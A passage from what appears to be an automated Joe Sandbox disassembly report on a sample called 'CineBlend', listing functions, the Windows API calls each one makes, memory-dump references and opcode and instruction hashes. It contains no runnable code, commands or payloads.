Part of subcall function 00B4338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00B43368,?), ref: 00B433CE
Part of subcall function 00B4338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C12418,00C12400,?,?,?,?,?,?,00B43368,?), ref: 00B4343A
Part of subcall function 00B4338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00C12418,?,?,?,?,?,?,?,00B43368,?), ref: 00B434BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00B43377

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 452e4d230a10bf847ca0b43c05e5b7f9e6f3ba74c665a6fe912a428f2edfdbf4
Instruction ID: fbef2a17a1c02f3d57a50a4844121f1ca77ac885fea6ca9e84190dadcf5c9a1b
Opcode Fuzzy Hash: 452e4d230a10bf847ca0b43c05e5b7f9e6f3ba74c665a6fe912a428f2edfdbf4
Instruction Fuzzy Hash: CEF05E35558344AFE710AF60EC0BBA877D8B706B09F44889AB519861F2DFBA86609B44

Function 00BB0B4C Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

Part of subcall function 00BB1312: InterlockedExchange.KERNEL32(?,?), ref: 00BB1322
Part of subcall function 00BB1312: EnterCriticalSection.KERNEL32(00000000,?), ref: 00BB1334
Part of subcall function 00BB1312: TerminateThread.KERNEL32(00000000,000001F6), ref: 00BB1342
Part of subcall function 00BB1312: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00BB1350
Part of subcall function 00BB1312: CloseHandle.KERNEL32(00000000), ref: 00BB135F
Part of subcall function 00BB1312: InterlockedExchange.KERNEL32(?,000001F6), ref: 00BB136F
Part of subcall function 00BB1312: LeaveCriticalSection.KERNEL32(00000000), ref: 00BB1376

CloseHandle.KERNELBASE(?,?,00BB0BBF), ref: 00BB0B5D
DeleteCriticalSection.KERNEL32(?,?,00BB0BBF), ref: 00BB0B83

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CriticalSection$CloseExchangeHandleInterlocked$DeleteEnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 2929296749-0
Opcode ID: 1c267c07e1f3fc4507c179c987c1b0f18e8a89de832b1508037f0e60bd57ff68
Instruction ID: fb185222eeba62d3629d3eded78818c125ef389fea6e6740898a5949314b71bc
Opcode Fuzzy Hash: 1c267c07e1f3fc4507c179c987c1b0f18e8a89de832b1508037f0e60bd57ff68
Instruction Fuzzy Hash: D9E01A32025601ABC7303F65EC05AA6FBE4BF04321F20889EF19A56831DBB4A8848B08

Function 00B4CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00B4CEEE

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: f3669804b74ef3f911ecffb94a4028d7182ad45e838e588d2c14e8e23abc660f
Instruction ID: d831195126d37cb89a3ccf39f8fe1729f672db12f63bb480ec575a4a7d5361ba
Opcode Fuzzy Hash: f3669804b74ef3f911ecffb94a4028d7182ad45e838e588d2c14e8e23abc660f
Instruction Fuzzy Hash: 83329D75A0020A9FCF10CF58C884BBABBF5EF45714F1584E9E916AB261C734EE45EB90

Function 00BC7AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 57c78ee44d2cf704b7d11489d8602bab7ad67062fcb2a5cc210a9d87992dcbf3
Instruction ID: 07535804edfb424763ac0bd496652878841bcbb123da8bd51bf2c623acae03b8
Opcode Fuzzy Hash: 57c78ee44d2cf704b7d11489d8602bab7ad67062fcb2a5cc210a9d87992dcbf3
Instruction Fuzzy Hash: 02D12A75A4420AEFCB14EF98C491EADBBF5FF48310F548199E915AB291DB30AE41CF90

Function 00B6F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b41da16d42e66154d57c2baf8b30dcc24b3b7ff4d453ff5b76e293b390cef658
Instruction ID: bc7ebf754cef4cf0bfe07f4e3909e37431b147cfee13ce9ae341d1bfd9abbf12
Opcode Fuzzy Hash: b41da16d42e66154d57c2baf8b30dcc24b3b7ff4d453ff5b76e293b390cef658
Instruction Fuzzy Hash: BE51B475A00109AFDB10DF68E851BB97BE2FB85364F19C1E8F8189B391D735AD42CB50

Function 00B46679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B4668B,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B4664A
Part of subcall function 00B4663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B4665C
Part of subcall function 00B4663E: FreeLibrary.KERNEL32(00000000,?,?,00B4668B,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B4666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B466AB

Part of subcall function 00B46607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B85657,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B46610
Part of subcall function 00B46607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B46622
Part of subcall function 00B46607: FreeLibrary.KERNEL32(00000000,?,?,00B85657,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B46635

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 2f894230e5b867b756bf3eea04db09b620ca603d3ed42e4e6d55a42157140b4c
Instruction ID: c469371b83117ec8bd8b3a10f30764406f47b51dcfc4f3c7d9c9fda9dcab54b6
Opcode Fuzzy Hash: 2f894230e5b867b756bf3eea04db09b620ca603d3ed42e4e6d55a42157140b4c
Instruction Fuzzy Hash: 5D11E372640205BBCF24BB20C802BEDBBE59F51710F1144AEF482A61C2EEB5DB05EB52

Function 00B78782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00B787C0

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 8c66adb75292db5582518b792686d7a8ee86fc7bf043b30a12d5bf451f89d668
Instruction ID: b73e4379690f97fff1203bbbe0ffde0b7193c1c8c1e446b2b2fa72d756d1e157
Opcode Fuzzy Hash: 8c66adb75292db5582518b792686d7a8ee86fc7bf043b30a12d5bf451f89d668
Instruction Fuzzy Hash: 5A1118B690410AAFCB05DF58E945A9E7BF4EF48310F1180A9F819AB311DA31EE11CBA5

Function 00B6E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
Instruction ID: d30071c49a2e444d34396c4690c9f6867eaef28ef56940347cb11d6dd67aa0f3
Opcode Fuzzy Hash: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
Instruction Fuzzy Hash: 4AF0CD36501A1456D6313A67DC0576A33D8CF42334F1487E6F539971D1EB78D80287D2

Function 00B4B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B4B333

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: e9cd17c5cbaedd8edb8b09e85265a98eb37cae1070fabcd04313bd3d0c823b07
Instruction ID: d17f5cea201a298072105abbf7b503b8b435022eb147d7463b32da8b446bb997
Opcode Fuzzy Hash: e9cd17c5cbaedd8edb8b09e85265a98eb37cae1070fabcd04313bd3d0c823b07
Instruction Fuzzy Hash: 52F0AFB36016046ED714AF29D806FA6BBD8EB44360F10866AFB19CB2D1DB35E5108AA4

Function 00BBF94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00BBF987

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 378a994a69b0b901f903da8de22baf1d0cb863fb2ad6fb84cad7f5b5bfd99fe5
Instruction ID: 32ba139ff29c2d59ff76fc8f7730645566c214fb8e2127ccc6181d4a32c561e4
Opcode Fuzzy Hash: 378a994a69b0b901f903da8de22baf1d0cb863fb2ad6fb84cad7f5b5bfd99fe5
Instruction Fuzzy Hash: A3F01972610205BFCB05EBA5DC4AEAFB7E8EF4A720F004095F505AB261EA74AA41C761

Function 00B74FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B7319C,00000001,00000364,?,00B60165,?,?,00BB11D9,0000FFFF), ref: 00B75031

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1fbff4d09d0bff831616b8eaedd1c5517054cbd34362576970c37d99f723dad2
Instruction ID: d9311b4e13630acb4997cf6324f728c3873ff65bf14986036d1a22208cc279e4
Opcode Fuzzy Hash: 1fbff4d09d0bff831616b8eaedd1c5517054cbd34362576970c37d99f723dad2
Instruction Fuzzy Hash: 8FF0E936551E24A7DB311E26DC01B5A77C8EF417E0F14C091F83CD7190EAB4D81186F4

Function 00B80144 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00B73B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B60165,?,?,00BB11D9,0000FFFF), ref: 00B73BC5

_free.LIBCMT ref: 00B80164

Part of subcall function 00B72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?), ref: 00B72D4E
Part of subcall function 00B72D38: GetLastError.KERNEL32(?,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?,?), ref: 00B72D60

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 4b32a033446cef2ee561aec414ef2ba888b0d19db61882311810b63bf46e2194
Instruction ID: a9514b0e4b2efcb74570806f0cf9cda1c0dbe0a2da54beeb6e86c375a6f5d39f
Opcode Fuzzy Hash: 4b32a033446cef2ee561aec414ef2ba888b0d19db61882311810b63bf46e2194
Instruction Fuzzy Hash: AFF06DB2005704CFE334AF10D885B92B7E8EB04725F10886EE69E97A91DB75A848CB94

Function 00B73B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00B60165,?,?,00BB11D9,0000FFFF), ref: 00B73BC5

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 679ead4ecd31f7a7df0852e3c82c494b0a59aa907be899d6307e8d50fb8c1dcf
Instruction ID: 6d0d54d7c344b52ddae7193d4d7d6c7a854d7af4d10ce18c487477500134a17c
Opcode Fuzzy Hash: 679ead4ecd31f7a7df0852e3c82c494b0a59aa907be899d6307e8d50fb8c1dcf
Instruction Fuzzy Hash: 6EE0E521250621A6DA3027729C01B5A76DCEF41BA0F1481E1EC6D96390DF24CD00B1A0

Function 00B466E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 220f73e3167fe26a50316a564017161563b58de49db30e9d6a4bb86405e57eea
Instruction ID: 88c91196acf9453c46adbd3f8e21999b3c6a208b4bf16ee8ce6daa325d71a9a2
Opcode Fuzzy Hash: 220f73e3167fe26a50316a564017161563b58de49db30e9d6a4bb86405e57eea
Instruction Fuzzy Hash: DDF03975505702CFCB389F64D8E0816BBE4FF1532932489BEE5D686620C7319C40EF11

Function 00B4684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00B46868

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: da2d7153755f88daea39d9a097bed8952d22f0f7e7d8087b3478205f8316cc16
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: 8EF0F87550020DFFDF05DF90C941E9E7BB9FB04318F208485F9159A151C336EA21EBA1

Function 00B43907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00B43963

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 0bfba285635e7d34d568fd1ffadb9a87c817a98e9c4754194dea8feab5b4ebca
Instruction ID: f1f364a0feefaf59f9bc362752c1a6d538478c486062febd43c83c46c70ba139
Opcode Fuzzy Hash: 0bfba285635e7d34d568fd1ffadb9a87c817a98e9c4754194dea8feab5b4ebca
Instruction Fuzzy Hash: 7AF0A7709003049FE7529F24DC45BD97BFCB701708F0040E9A28897291DB744798CF41

Function 00B43A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B43A76

Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 3aeef0d3c3a768e75dc3e858384a2c26891c1bc229ee1b39e8fa0b7f824754fd
Instruction ID: 2011c7f0384c480b6748b4ecbb9b38f7dfcbc0b34785429a5bce0a1a6e6dc743
Opcode Fuzzy Hash: 3aeef0d3c3a768e75dc3e858384a2c26891c1bc229ee1b39e8fa0b7f824754fd
Instruction Fuzzy Hash: 4CE0867290012457C710A6589C05FEA77DDDB887A0F0440B1BC45D7254D9609D809690

Function 00BAE83E Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00BAE857

Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: FolderPath_wcslen
String ID:
API String ID: 2987691875-0
Opcode ID: 52ffb5baf3f3adb3e32ef8797d3095698e57ba97cf1ad416c0555743495f3e6d
Instruction ID: ff89a30281beb113cd712e4c5afe4aa82a14a91662c5c2671811ebcad85eb76d
Opcode Fuzzy Hash: 52ffb5baf3f3adb3e32ef8797d3095698e57ba97cf1ad416c0555743495f3e6d
Instruction Fuzzy Hash: FAD05EA59002282BDF60A6749C0DDBB7AACCB40210F0006A178ADD3152EE30EE448AA0

Function 00BB12EB Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_000712D1,00000000,00000000,?), ref: 00BB1306

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: e3cd986f04f02ec1eef6fc92a8574aea766554681eb11e3335c1dc59b7776aec
